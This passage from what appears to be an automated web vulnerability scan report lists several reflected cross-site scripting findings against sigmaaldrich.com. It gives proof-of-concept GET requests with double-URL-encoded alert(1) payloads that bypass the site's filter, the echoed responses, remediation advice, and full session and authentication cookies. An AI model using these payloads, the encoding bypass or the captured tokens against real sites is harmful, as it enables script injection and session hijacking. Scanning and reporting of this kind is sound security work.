Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichceee4";alert(1)//5e7262edb02/social/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.476. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f4ab%2522%253balert%25281%2529%252f%252f6f48b0a67c6 was submitted in the REST URL parameter 4. This input was echoed as 1f4ab";alert(1)//6f48b0a67c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social1f4ab%2522%253balert%25281%2529%252f%252f6f48b0a67c6/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social1f4ab";alert(1)//6f48b0a67c6/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.477. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242a7%2522%253balert%25281%2529%252f%252fe3030dcf4ae was submitted in the REST URL parameter 5. This input was echoed as 242a7";alert(1)//e3030dcf4ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/fb-25x25242a7%2522%253balert%25281%2529%252f%252fe3030dcf4ae HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/fb-25x25242a7";alert(1)//e3030dcf4ae","E404") ;
   </script>
...[SNIP]...

1.478. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21501%2522%253balert%25281%2529%252f%252fa466074d5bc was submitted in the REST URL parameter 1. This input was echoed as 21501";alert(1)//a466074d5bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc21501%2522%253balert%25281%2529%252f%252fa466074d5bc/medialib/sigma-aldrich/social/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc21501";alert(1)//a466074d5bc/medialib/sigma-aldrich/social/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.479. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf4ce%2522%253balert%25281%2529%252f%252f53361c3178b was submitted in the REST URL parameter 2. This input was echoed as bf4ce";alert(1)//53361c3178b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibbf4ce%2522%253balert%25281%2529%252f%252f53361c3178b/sigma-aldrich/social/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibbf4ce";alert(1)//53361c3178b/sigma-aldrich/social/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.480. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f03e%2522%253balert%25281%2529%252f%252f8f2ccd45570 was submitted in the REST URL parameter 3. This input was echoed as 4f03e";alert(1)//8f2ccd45570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich4f03e%2522%253balert%25281%2529%252f%252f8f2ccd45570/social/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
